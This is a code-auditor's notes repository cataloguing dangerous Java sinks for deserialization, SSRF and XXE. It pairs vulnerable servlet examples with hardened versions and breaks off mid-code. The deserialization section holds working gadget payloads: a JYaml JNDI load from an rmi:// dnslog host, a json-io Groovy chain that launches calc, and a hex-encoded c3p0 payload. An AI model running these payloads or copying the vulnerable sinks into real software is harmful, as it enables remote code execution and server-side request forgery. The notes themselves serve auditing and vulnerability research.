├── README.md ├── java ├── README.md ├── deserialization │ └── note.md ├── ssrf │ └── note.md └── xxe │ └── note.md └── python ├── logInjection └── note.md └── pathInjection └── note.md /README.md: -------------------------------------------------------------------------------- 1 | # sec-note 2 | 记录各语言、框架中危险的sink,个人代码审计、漏洞研究使用。 3 | -------------------------------------------------------------------------------- /java/README.md: -------------------------------------------------------------------------------- 1 | 记录Java危险的sinks 2 | -------------------------------------------------------------------------------- /java/deserialization/note.md: -------------------------------------------------------------------------------- 1 | # Java反序列化文档 2 | 3 | ## JYaml反序列化 4 | 5 | ```java 6 | import org.ho.yaml.Yaml; 7 | 8 | public class TestJYaml { 9 | 10 | String data = "--- !com.sun.rowset.JdbcRowSetImpl\n" 11 | + "dataSourceName: \"rmi://jyaml1.vwfkh3.dnslog.cn:1099/Exploit\"\n" 12 | + "autoCommit: true"; 13 | 14 | Yaml yaml = new Yaml(); 15 | 16 | yaml.load(data); //bad 17 | yaml.loadStream(data); //bad 18 | yaml.loadType(data, Object.class); //bad 当class指定为反序列化的类对象时,反序列化成功 19 | yaml.loadStreamOfType(data, Object.class); //bad 20 | 21 | } 22 | ``` 23 | 24 | ## JsonIO反序列化 25 | 26 | ```pom 27 | 28 | com.cedarsoftware 29 | json-io 30 | 4.10.0 31 | 32 | 33 | org.codehaus.groovy 34 | groovy-all 35 | 2.4.9 36 | 37 | ``` 38 | 39 | ```java 40 | import com.cedarsoftware.util.io.JsonReader; 41 | 42 | public class TestJsonIO { 43 | 44 | String poc = "{\"@type\":\"java.util.Arrays$ArrayList\",\"@items\":[{\"@id\":2,\"@type\":\"groovy.util.Expando\",\"expandoProperties\":{\"@type\":\"java.util.HashMap\",\"hashCode\":{\"@type\":\"org.codehaus.groovy.runtime.MethodClosure\",\"method\":\"start\",\"delegate\":{\"@id\":1,\"@type\":\"java.lang.ProcessBuilder\",\"command\":{\"@type\":\"java.util.ArrayList\",\"@items\":[\"cmd\",\"/c\",\"calc\"]},\"directory\":null,\"environment\":null,\"redirectErrorStream\":false,\"redirects\":null},\"owner\":{\"@ref\":1},\"thisObject\":null,\"resolveStrategy\":0,\"directive\":0,\"parameterTypes\":[],\"maximumNumberOfParameters\":0,\"bcw\":null}}},{\"@type\":\"java.util.HashMap\",\"@keys\":[{\"@ref\":2},{\"@ref\":2}],\"@items\":[{\"@ref\":2},{\"@ref\":2}]}]}"; 45 | 46 | JsonReader.jsonToJava(poc); 47 | } 48 | ``` 49 | 50 | ## YAMLBeans反序列化 51 | ```pom 52 | 53 | com.esotericsoftware.yamlbeans 54 | yamlbeans 55 | 1.09 56 | 57 | 58 | com.mchange 59 | c3p0 60 | 0.9.5.2 61 | 62 | ``` 63 | 64 | ```java 65 | import com.esotericsoftware.yamlbeans.YamlConfig; 66 | import com.esotericsoftware.yamlbeans.YamlReader; 67 | 68 | public class TestYAMLBeans { 69 | 70 | String data = "!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\n" 71 | + " userOverridesAsString: \"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a707070707070707070707874000443616c63740016687474703a2f2f3132372e302e302e313a383038382f740003466f6f;\""; 72 | 73 | YamlConfig yc = new YamlConfig(); 74 | YamlReader r = new YamlReader(data, yc); //yc传不传入都行 75 | r.read(); 76 | r.read(Object.class); 77 | r.read(Object.class, Object.class); 78 | } 79 | ``` 80 | 81 | 82 | 83 | ## XStream反序列化 84 | 85 | 低版本验证 86 | 87 | ```PayLoad 88 | SSRF 89 | String payload = "\n" + 90 | " \n" + 91 | " \n" + 92 | " 0\n" + 93 | " \n" + 94 | " \n" + 95 | " \n" + 96 | " http://127.0.0.1:8000/ntuser.ini\n" + 97 | " \n" + 98 | " \n" + 99 | " \n" + 100 | " 0\n" + 101 | " \n" + 102 | " \n" + 103 | " test\n" + 104 | " \n" + 105 | ""; 106 | ```` 107 | 108 | ```java 109 | 110 | XStream xStream = new XStream(); 111 | xStream.fromXML(payload); //bad 112 | xStream.unmarshal(payload); //bad 113 | 114 | ``` 115 | 116 | ## Spring XStreamMarshaller反序列化 117 | 118 | 简介:Spring XStreamMarshaller底层调用了XStream, 开源代码库未找到相关使用 119 | 120 | ```java 121 | XStreamMarshaller xStreamMarshaller = new XStreamMarshaller(); 122 | ``` 123 | -------------------------------------------------------------------------------- /java/ssrf/note.md: -------------------------------------------------------------------------------- 1 | # Java SSRF跨站请求伪造文档 2 | 3 | * [java-net ssrf](#java-net-ssrf) 4 | * [springframework ssrf](#springframework-ssrf) 5 | 6 | ## 1 sinks: 7 | 8 | 格式:namespace;type;subtypes;names;signature;ext;input;additionalTaintStep;additionalTaintStepInput;additionalTaintStep1;additionalTaintStepInput1... 9 | 10 | 11 | namespace:包名 12 | type:类名 13 | names:触发漏洞方法名 14 | input:触发漏洞方法名的形参位置 15 | additionalTaintStep:依赖的污点 16 | 17 | 18 | ### 1.1 java-net: 19 | 20 | ```java 21 | java.net;URL;false;[openConnection, openStream];;;Argument[-1];java.net.URL(String);Argument[0] 22 | 23 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader(URL[]);Argument[0];java.net.URL(String);Argument[0] 24 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader(URL[], ClassLoader);Argument[0];java.net.URL(String);Argument[0] 25 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader(URL[],ClassLoader,URLStreamHandlerFactory);Argument[0];java.net.URL(String);Argument[0] 26 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader(String,URL[],ClassLoader);Argument[1];java.net.URL(String);Argument[0] 27 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader(String,URL[],ClassLoader,URLStreamHandlerFactory);Argument[1];java.net.URL(String);Argument[0] 28 | 29 | 30 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader.newInstance(URL[]);Argument[0];java.net.URL(String);Argument[0] 31 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader.newInstance(URL[],ClassLoader);Argument[0];java.net.URL(String);Argument[0] 32 | 33 | java.net.http;HttpRequest;false;[newBuilder];;;Argument[0];java.net.URI.create(String);Argument[0] # jdk11 34 | java.net.http;HttpRequest.Builder;false;[uri];;;Argument[0];java.net.URI.create(String);Argument[0] # jdk11 35 | ``` 36 | java.net.URI.create(String);Argument[0] 应该做为一个全局污点 37 | 38 | ### 1.2 springframework: 39 | 40 | org.springframework.web.client.RestTemplate 属于 spring-web模块 41 | ```java 42 | org.springframework.web.client;RestTemplate;false;[put,delete,exchange,execute,getForEntity,getForObject,headForHeaders,optionsForAllow,patchForObject,postForEntity,postForLocation,postForObject];;;Argument[0] 43 | org.springframework.web.client;RestTemplate;false;[put,delete,doExecute,execute,getForEntity,getForObject,headForHeaders,optionsForAllow,patchForObject,postForEntity,postForLocation,postForObject];;;Argument[0];java.net.URI.create(String);Argument[0] 44 | org.springframework.web.client;RestTemplate;false;[exchange];;;Argument[0];org.springframework.http.RequestEntity(...,URI,...);Argument[ParameterType = URI] # 创建RequestEntity对象,URI形参位置 45 | ``` 46 | 47 | 48 | 49 | ## 2 示例 50 | 51 | ### Java net ssrf 52 | 53 | java.net.URL 支持的协议:file、ftp、http、https、jar、mailto、netdoc 54 | 55 | 56 | 57 | ```java 58 | import java.net.URL; 59 | import java.net.URI; 60 | import java.net.http.HttpClient; 61 | import java.net.http.HttpRequest; 62 | import java.net.http.HttpResponse; 63 | import java.net.http.HttpResponse.BodyHandlers; 64 | 65 | public void badJavaNetURLSSRF(HttpServletRequest request) throws Exception { 66 | String requestUrl = request.getParameter("url"); 67 | URL xxx = new URL(requestUrl); 68 | xxx.openConnection(); //bad 69 | xxx.openStream(); //bad 70 | } 71 | 72 | public void badJavaNetURLClassLoaderSSRF(HttpServletRequest request) throws Exception { 73 | String requestUrl = request.getParameter("url"); 74 | URL[] urls = new URL[]{xxx}; 75 | URLClassLoader urlClassLoader = URLClassLoader.newInstance(urls); 76 | urlClassLoader.findResource("test"); //bad 77 | urlClassLoader.loadClass("aaa"); //bad 78 | } 79 | 80 | public void badJavaNetHttpRequestSSRF(HttpServletRequest request) throws Exception { 81 | String requestUrl = request.getParameter("url"); 82 | HttpClient client = HttpClient.newHttpClient(); 83 | HttpRequest request = HttpRequest.newBuilder().uri(URI.create(requestUrl)).build(); //bad 84 | client.sendAsync(request, BodyHandlers.ofString()).thenApply(HttpResponse::body).thenAccept(System.out::println).join(); 85 | } 86 | ``` 87 | 88 | ### springframework ssrf 89 | 90 | 91 | ```java 92 | import java.net.URI; 93 | import org.springframework.web.client.RestTemplate; 94 | 95 | public void badRestTemplateSSRF(HttpServletRequest request) throws Exception { 96 | String requestUrl = request.getParameter("url"); 97 | RestTemplate restTemplate = new RestTemplate(); 98 | restTemplate.delete(requestUrl); //bad 99 | } 100 | 101 | public void badRestTemplateUriSSRF(HttpServletRequest request) throws Exception { 102 | String requestUrl = request.getParameter("url"); 103 | RestTemplate restTemplate = new RestTemplate(); 104 | restTemplate.delete(URI.create(requestUrl)); //bad 105 | } 106 | ``` 107 | -------------------------------------------------------------------------------- /java/xxe/note.md: -------------------------------------------------------------------------------- 1 | # Java XML external entity (XXE) injection文档 2 | 3 | * [Commons-Digester3 XXE注入](#Commons-Digester3-XXE注入) 4 | * [Commons-Digester XXE注入](#Commons-Digester-XXE注入) 5 | * [Tomcat-Digester XXE注入](#Tomcat-Digester-XXE注入) 6 | * [DocumentHelper XXE注入](#DocumentHelper-XXE注入) 7 | * [Validator XXE注入](#Validator-XXE注入) 8 | * [XMLDecoder XXE注入](#XMLDecoder-XXE注入) 9 | * [DocumentBuilder XXE注入](#DocumentBuilder-XXE注入) 10 | * [jdom2-SAXBuilder XXE注入](#jdom2-SAXBuilder-XXE注入) 11 | * [jdom-SAXBuilder XXE注入](#jdom-SAXBuilder-XXE注入) 12 | * [SAXParser XXE注入](#SAXParser-XXE注入) 13 | * [SAXReader XXE注入](#SAXReader-XXE注入) 14 | * [XMLReader XXE注入](#XMLReader-XXE注入) 15 | * [Transformer XXE注入](#Transformer-XXE注入) 16 | * [TransformerFactory XXE注入](#TransformerFactory-XXE注入) 17 | * [SAXTransformerFactory XXE注入](#SAXTransformerFactory-XXE注入) 18 | * [SchemaFactory XXE注入](#SchemaFactory-XXE注入) 19 | * [Unmarshaller XXE注入](#Unmarshaller-XXE注入) 20 | * [XPathExpression XXE注入](#XPathExpression-XXE注入) 21 | * [Persister XXE注入](#Persister-XXE注入) 22 | 23 | sinks: 24 | 25 | Commons-Digester3: 26 | 27 | ``` 28 | org.apache.commons.digester3.Digester;parse(File file); T 29 | org.apache.commons.digester3.Digester;parse(InputSource input); T 30 | org.apache.commons.digester3.Digester;parse(InputStream input); T 31 | org.apache.commons.digester3.Digester;parse(Reader reader); T 32 | org.apache.commons.digester3.Digester;parse(String uri); T 33 | org.apache.commons.digester3.Digester;parse(URL url); T 34 | org.apache.commons.digester3.Digester;asyncParse(final File file); T 35 | org.apache.commons.digester3.Digester;asyncParse(InputSource input); T 36 | org.apache.commons.digester3.Digester;asyncParse(InputStream input); T 37 | org.apache.commons.digester3.Digester;asyncParse(Reader reader); T 38 | org.apache.commons.digester3.Digester;asyncParse(String uri); T 39 | org.apache.commons.digester3.Digester;asyncParse(URL url); T 40 | ``` 41 | 42 | Commons-Digester: 43 | 44 | ``` 45 | org.apache.commons.digester.Digester;parse(File file);Object 46 | org.apache.commons.digester.Digester;parse(InputSource input);Object 47 | org.apache.commons.digester.Digester;parse(InputStream input);Object 48 | org.apache.commons.digester.Digester;parse(Reader reader);Object 49 | org.apache.commons.digester.Digester;parse(String uri);Object 50 | org.apache.commons.digester.Digester;parse(URL url);Object 51 | ``` 52 | 53 | Tomcat-Digester: 54 | 55 | ``` 56 | org.apache.tomcat.util.digester.Digester;parse(File file);Object 57 | org.apache.tomcat.util.digester.Digester;parse(InputSource input);Object 58 | org.apache.tomcat.util.digester.Digester;parse(InputStream input);Object 59 | ``` 60 | 61 | DocumentHelper: 62 | 63 | ``` 64 | org.dom4j.DocumentHelper;parseText(String text);Document 65 | ``` 66 | 67 | Validator: 68 | 69 | ``` 70 | javax.xml.validation.Validator;validate(Source source);void 71 | ``` 72 | 73 | XMLDecoder: 74 | 75 | ``` 76 | java.beans.XMLDecoder;readObject();Object 77 | ``` 78 | 79 | DocumentBuilder: 80 | 81 | ``` 82 | javax.xml.parsers.DocumentBuilder;parse(InputStream is);Document 83 | javax.xml.parsers.DocumentBuilder;parse(InputStream is, String systemId);Document 84 | javax.xml.parsers.DocumentBuilder;parse(String uri);Document 85 | javax.xml.parsers.DocumentBuilder;parse(File f);Document 86 | javax.xml.parsers.DocumentBuilder;parse(InputSource is);Document 87 | ``` 88 | 89 | jdom-SAXBuilder: 90 | 91 | ``` 92 | org.jdom.input.SAXBuilder;build(org.w3c.dom.Document domDocument);Document 93 | org.jdom.input.SAXBuilder;build(org.w3c.dom.Element domElement);Document 94 | ``` 95 | 96 | jdom2-SAXBuilder: 97 | 98 | ``` 99 | org.jdom2.input.SAXBuilder;build(InputSource in);Document 100 | org.jdom2.input.SAXBuilder;build(InputStream in);Document 101 | org.jdom2.input.SAXBuilder;build(File file);Document 102 | org.jdom2.input.SAXBuilder;build(URL url);Document 103 | org.jdom2.input.SAXBuilder;build(InputStream in, String systemId);Document 104 | org.jdom2.input.SAXBuilder;build(Reader characterStream);Document 105 | org.jdom2.input.SAXBuilder;build(Reader characterStream, String systemId);Document 106 | org.jdom2.input.SAXBuilder;build(String systemId);Document 107 | ``` 108 | 109 | SAXParser: 110 | 111 | ``` 112 | javax.xml.parsers.SAXParser;parse(InputStream is, HandlerBase hb);void 113 | javax.xml.parsers.SAXParser;parse(InputStream is, HandlerBase hb, String systemId);void 114 | javax.xml.parsers.SAXParser;parse(InputStream is, DefaultHandler dh);void 115 | javax.xml.parsers.SAXParser;parse(InputStream is, DefaultHandler dh, String systemId);void 116 | javax.xml.parsers.SAXParser;parse(String uri, HandlerBase hb);void 117 | javax.xml.parsers.SAXParser;parse(String uri, DefaultHandler dh);void 118 | javax.xml.parsers.SAXParser;parse(File f, HandlerBase hb);void 119 | javax.xml.parsers.SAXParser;parse(File f, DefaultHandler dh);void 120 | javax.xml.parsers.SAXParser;parse(InputSource is, HandlerBase hb);void 121 | javax.xml.parsers.SAXParser;parse(InputSource is, DefaultHandler dh);void 122 | ``` 123 | 124 | SAXReader: 125 | 126 | ``` 127 | org.dom4j.io.SAXReader;read(File file);Document 128 | org.dom4j.io.SAXReader;read(URL url);Document 129 | org.dom4j.io.SAXReader;read(String systemId);Document 130 | org.dom4j.io.SAXReader;read(InputStream in);Document 131 | org.dom4j.io.SAXReader;read(Reader reader);Document 132 | org.dom4j.io.SAXReader;read(InputStream in, String systemId);Document 133 | org.dom4j.io.SAXReader;read(Reader reader, String systemId);Document 134 | org.dom4j.io.SAXReader;read(InputSource in);Document 135 | ``` 136 | 137 | XMLReader: 138 | 139 | ``` 140 | org.xml.sax.XMLReader;parse(InputSource input);void 141 | org.xml.sax.XMLReader;parse(String systemId);void 142 | ``` 143 | 144 | Transformer: 145 | 146 | ``` 147 | javax.xml.transform.Transformer;transform(Source xmlSource, Result outputTarget);void 148 | ``` 149 | 150 | TransformerFactory: 151 | 152 | ``` 153 | javax.xml.transform.TransformerFactory;newTransformer(Source source);Transformer 154 | ``` 155 | 156 | SAXTransformerFactory(TransformerFactory子类): 157 | 158 | ``` 159 | javax.xml.transform.sax.SAXTransformerFactory;newTransformer(Source source);Transformer 160 | javax.xml.transform.sax.SAXTransformerFactory;newTransformerHandler(Source src);TransformerHandler 161 | javax.xml.transform.sax.SAXTransformerFactory;newTransformerHandler(Templates templates);TransformerHandler 162 | javax.xml.transform.sax.SAXTransformerFactory;newXMLFilter(Source src);XMLFilter 163 | javax.xml.transform.sax.SAXTransformerFactory;newXMLFilter(Templates templates);XMLFilter 164 | ``` 165 | 166 | SchemaFactory: 167 | 168 | ``` 169 | javax.xml.validation.SchemaFactory;newSchema(Source schema);Schema 170 | javax.xml.validation.SchemaFactory;newSchema(File schema);Schema 171 | javax.xml.validation.SchemaFactory;newSchema(URL schema);Schema 172 | javax.xml.validation.SchemaFactory;newSchema(Source[] schemas);Schema 173 | ``` 174 | 175 | Unmarshaller: 176 | 177 | ``` 178 | javax.xml.bind.Unmarshaller;unmarshal(java.io.File f);Object 179 | javax.xml.bind.Unmarshaller;unmarshal(java.io.InputStream is);Object 180 | javax.xml.bind.Unmarshaller;unmarshal(Reader reader);Object 181 | javax.xml.bind.Unmarshaller;unmarshal(java.net.URL url);Object 182 | javax.xml.bind.Unmarshaller;unmarshal(org.xml.sax.InputSource source);Object 183 | javax.xml.bind.Unmarshaller;unmarshal(org.w3c.dom.Node node);Object 184 | javax.xml.bind.Unmarshaller;unmarshal(org.w3c.dom.Node node, Class declaredType);Object 185 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.transform.Source source);Object 186 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.transform.Source source, Class declaredType);Object 187 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.stream.XMLStreamReader reader);Object 188 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.stream.XMLStreamReader reader, Class declaredType);Object 189 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.stream.XMLEventReader reader);Object 190 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.stream.XMLEventReader reader, Class declaredType);Object 191 | ``` 192 | 193 | XPathExpression: 194 | 195 | ``` 196 | javax.xml.xpath.XPathExpression;evaluate(InputSource source, QName returnType);Object 197 | javax.xml.xpath.XPathExpression;evaluate(InputSource source);String 198 | ``` 199 | 200 | Persister: 201 | 202 | ``` 203 | org.simpleframework.xml.core.Persister;read(Class type, String source); T 204 | org.simpleframework.xml.core.Persister;read(Class type, File source); T 205 | org.simpleframework.xml.core.Persister;read(Class type, InputStream source); T 206 | org.simpleframework.xml.core.Persister;read(Class type, Reader source); T 207 | org.simpleframework.xml.core.Persister;read(Class type, InputNode source); T 208 | org.simpleframework.xml.core.Persister;read(Class type, String source, boolean strict); T 209 | org.simpleframework.xml.core.Persister;read(Class type, File source, boolean strict); T 210 | org.simpleframework.xml.core.Persister;read(Class type, InputStream source, boolean strict); T 211 | org.simpleframework.xml.core.Persister;read(Class type, Reader source, boolean strict); T 212 | org.simpleframework.xml.core.Persister;read(Class type, InputNode node, boolean strict); T 213 | org.simpleframework.xml.core.Persister;read(Class type, InputNode node, Session session); T 214 | org.simpleframework.xml.core.Persister;read(Class type, InputNode node, Context context); T 215 | org.simpleframework.xml.core.Persister;read(T value, String source); T 216 | org.simpleframework.xml.core.Persister;read(T value, File source); T 217 | org.simpleframework.xml.core.Persister;read(T value, InputStream source); T 218 | org.simpleframework.xml.core.Persister;read(T value, Reader source); T 219 | org.simpleframework.xml.core.Persister;read(T value, InputNode source); T 220 | org.simpleframework.xml.core.Persister;read(T value, String source, boolean strict); T 221 | org.simpleframework.xml.core.Persister;read(T value, File source, boolean strict); T 222 | org.simpleframework.xml.core.Persister;read(T value, InputStream source, boolean strict); T 223 | org.simpleframework.xml.core.Persister;read(T value, Reader source, boolean strict); T 224 | org.simpleframework.xml.core.Persister;read(T value, InputNode node, boolean strict); T 225 | org.simpleframework.xml.core.Persister;read(T value, InputNode node, Session session); T 226 | org.simpleframework.xml.core.Persister;read(T value, InputNode node, Context context); T 227 | org.simpleframework.xml.core.Persister;validate(Class type, String source);boolean 228 | org.simpleframework.xml.core.Persister;validate(Class type, File source);boolean 229 | org.simpleframework.xml.core.Persister;validate(Class type, InputStream source);boolean 230 | org.simpleframework.xml.core.Persister;validate(Class type, Reader source);boolean 231 | org.simpleframework.xml.core.Persister;validate(Class type, InputNode source);boolean 232 | org.simpleframework.xml.core.Persister;validate(Class type, String source, boolean strict);boolean 233 | org.simpleframework.xml.core.Persister;validate(Class type, File source, boolean strict);boolean 234 | org.simpleframework.xml.core.Persister;validate(Class type, InputStream source, boolean strict);boolean 235 | org.simpleframework.xml.core.Persister;validate(Class type, Reader source, boolean strict);boolean 236 | org.simpleframework.xml.core.Persister;validate(Class type, InputNode node, boolean strict);boolean 237 | org.simpleframework.xml.core.Persister;validate(Class type, InputNode node, Session session);boolean 238 | org.simpleframework.xml.core.Persister;validate(Class type, InputNode node, Context context);boolean 239 | ``` 240 | 241 | 242 | ## Commons-Digester3 XXE注入 243 | 244 | 245 | `mvnrepository.com`最新版本更新到3.2,该组件所有版本目前都存在问题. 246 | 247 | ```pom 248 | 249 | org.apache.commons 250 | commons-digester3 251 | 3.2 252 | 253 | ``` 254 | 255 | ```java 256 | import org.apache.commons.digester3.Digester; 257 | 258 | public void badDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 259 | ServletInputStream servletInputStream = request.getInputStream(); 260 | Digester digester = new Digester(); 261 | digester.parse(servletInputStream); //实际调用org.xml.sax.XMLReader解析xml数据 262 | } 263 | 264 | 265 | public void okDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 266 | ServletInputStream servletInputStream = request.getInputStream(); 267 | Digester digester = new Digester(); 268 | digester.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 269 | digester.setFeature("http://xml.org/sax/features/external-general-entities", false); 270 | digester.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 271 | digester.parse(servletInputStream); 272 | } 273 | ``` 274 | 275 | ## Commons-Digester XXE注入 276 | 277 | `mvnrepository.com`最新版本更新到2.1,该组件所有版本目前都存在问题. 278 | 279 | ```pom 280 | 281 | commons-digester 282 | commons-digester 283 | 2.1 284 | 285 | ``` 286 | 287 | ```java 288 | import org.apache.commons.digester.Digester; 289 | 290 | public void badDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 291 | ServletInputStream servletInputStream = request.getInputStream(); 292 | Digester digester = new Digester(); 293 | digester.parse(servletInputStream); //实际调用org.xml.sax.XMLReader解析xml数据 294 | } 295 | 296 | 297 | public void okDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 298 | ServletInputStream servletInputStream = request.getInputStream(); 299 | Digester digester = new Digester(); 300 | digester.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 301 | digester.setFeature("http://xml.org/sax/features/external-general-entities", false); 302 | digester.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 303 | digester.parse(servletInputStream); 304 | } 305 | ``` 306 | 307 | ## Tomcat-Digester XXE注入 308 | 309 | apache tomcat自己实现了Digester解析xml文件, 使用该类时存在xxe注入漏洞. 310 | 311 | ```java 312 | import org.apache.tomcat.util.digester.Digester; 313 | 314 | public void badDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 315 | ServletInputStream servletInputStream = request.getInputStream(); 316 | Digester digester = new Digester(); 317 | digester.parse(servletInputStream); //实际调用org.xml.sax.XMLReader解析xml数据 318 | } 319 | 320 | 321 | public void okDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 322 | ServletInputStream servletInputStream = request.getInputStream(); 323 | Digester digester = new Digester(); 324 | digester.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 325 | digester.setFeature("http://xml.org/sax/features/external-general-entities", false); 326 | digester.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 327 | digester.parse(servletInputStream); 328 | } 329 | ``` 330 | 331 | ## DocumentHelper XXE注入 332 | 333 | 低于2.1.1版本的存在漏洞 334 | 335 | ```pom 336 | 337 | org.dom4j 338 | dom4j 339 | 2.0.1 340 | 341 | ``` 342 | 343 | ```java 344 | import org.dom4j.Document; 345 | import org.dom4j.DocumentHelper; 346 | 347 | public void badDocumentHelper(HttpServletRequest request) throws Exception { 348 | BufferedReader br = request.getReader(); 349 | String str = ""; 350 | StringBuilder listString = new StringBuilder(); 351 | while ((str = br.readLine()) != null) { 352 | listString.append(str).append("\n"); 353 | } 354 | Document document = DocumentHelper.parseText(listString.toString()); 355 | } 356 | ``` 357 | 358 | ## Validator XXE注入 359 | 360 | JDK原生, CVE-2019-12415中的sink 361 | 362 | ```java 363 | import javax.xml.transform.stream.StreamSource; 364 | import javax.xml.validation.Schema; 365 | import javax.xml.validation.SchemaFactory; 366 | import javax.xml.validation.Validator; 367 | 368 | public void badValidator(HttpServletRequest request) throws Exception { 369 | ServletInputStream servletInputStream = request.getInputStream(); 370 | SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); 371 | Schema schema = factory.newSchema(); 372 | Validator validator = schema.newValidator(); 373 | StreamSource source = new StreamSource(servletInputStream); 374 | validator.validate(source); 375 | } 376 | 377 | 378 | public void ok1Validator(HttpServletRequest request) throws Exception { 379 | ServletInputStream servletInputStream = request.getInputStream(); 380 | SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); 381 | factory.setFeature("http://javax.xml.XMLConstants/feature/secure-processing", true); 382 | Schema schema = factory.newSchema(); 383 | Validator validator = schema.newValidator(); 384 | StreamSource source = new StreamSource(servletInputStream); 385 | validator.validate(source); 386 | } 387 | 388 | public void ok2Validator(HttpServletRequest request) throws Exception { 389 | ServletInputStream servletInputStream = request.getInputStream(); 390 | SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); 391 | Schema schema = factory.newSchema(); 392 | Validator validator = schema.newValidator(); 393 | validator.setProperty("http://javax.xml.XMLConstants/property/accessExternalDTD", ""); 394 | validator.setProperty("http://javax.xml.XMLConstants/property/accessExternalSchema", ""); 395 | StreamSource source = new StreamSource(servletInputStream); 396 | validator.validate(source); 397 | } 398 | ``` 399 | 400 | 401 | ## XMLDecoder XXE注入 402 | 403 | JDK原生,在JDK1.7.0_21测试存在,JDK1.8不存在,JDK1.7.X其他版本暂未测试。 404 | 405 | ```java 406 | import java.beans.XMLDecoder; 407 | 408 | public void badXMLDecoder(HttpServletRequest request) throws Exception { 409 | ServletInputStream servletInputStream = request.getInputStream(); 410 | XMLDecoder xmlDecoder = new XMLDecoder(servletInputStream); 411 | xmlDecoder.readObject(); 412 | } 413 | ``` 414 | 415 | ## DocumentBuilder XXE注入 416 | 417 | ```java 418 | import javax.xml.parsers.DocumentBuilder; 419 | import javax.xml.parsers.DocumentBuilderFactory; 420 | 421 | public void badDocumentBuilder(HttpServletRequest request) throws Exception { 422 | ServletInputStream servletInputStream = request.getInputStream(); 423 | DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); 424 | DocumentBuilder documentBuilder = factory.newDocumentBuilder(); 425 | documentBuilder.parse(servletInputStream); 426 | } 427 | ``` 428 | 429 | ## jdom2-SAXBuilder XXE注入 430 | 431 | ```java 432 | import org.jdom2.input.SAXBuilder; 433 | 434 | public void badSAXBuilder(HttpServletRequest request) throws Exception { 435 | ServletInputStream servletInputStream = request.getInputStream(); 436 | SAXBuilder builder = new SAXBuilder(); 437 | Document doc = builder.build(servletInputStream); 438 | } 439 | 440 | public void goodSAXBuilder(HttpServletRequest request) throws Exception { 441 | ServletInputStream servletInputStream = request.getInputStream(); 442 | SAXBuilder builder = new SAXBuilder(true); 443 | Document doc = builder.build(servletInputStream); 444 | } 445 | 446 | public void goodSAXBuilder(HttpServletRequest request) throws Exception { 447 | ServletInputStream servletInputStream = request.getInputStream(); 448 | SAXBuilder saxBuilder = new SAXBuilder(); 449 | saxBuilder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 450 | saxBuilder.build(file); 451 | } 452 | ``` 453 | 454 | ## jdom-SAXBuilder XXE注入 455 | 456 | ```java 457 | import org.jdom.input.SAXBuilder; 458 | 459 | public void badSAXBuilder(HttpServletRequest request) throws Exception { 460 | ServletInputStream servletInputStream = request.getInputStream(); 461 | SAXBuilder builder = new SAXBuilder(); 462 | Document doc = builder.build(servletInputStream); 463 | } 464 | ``` 465 | 466 | ## SAXParser XXE注入 467 | 468 | ```java 469 | import javax.xml.parsers.SAXParser; 470 | import javax.xml.parsers.SAXParserFactory; 471 | 472 | public void badSAXParser(HttpServletRequest request) throws Exception { 473 | ServletInputStream servletInputStream = request.getInputStream(); 474 | SAXParserFactory spf = SAXParserFactory.newInstance(); 475 | SAXParser parser = spf.newSAXParser(); 476 | parser.parse(servletInputStream, new HandlerBase()); 477 | } 478 | 479 | public void okSAXParser(HttpServletRequest request) throws Exception { 480 | ServletInputStream servletInputStream = request.getInputStream(); 481 | SAXParserFactory spf = SAXParserFactory.newInstance(); 482 | spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 483 | 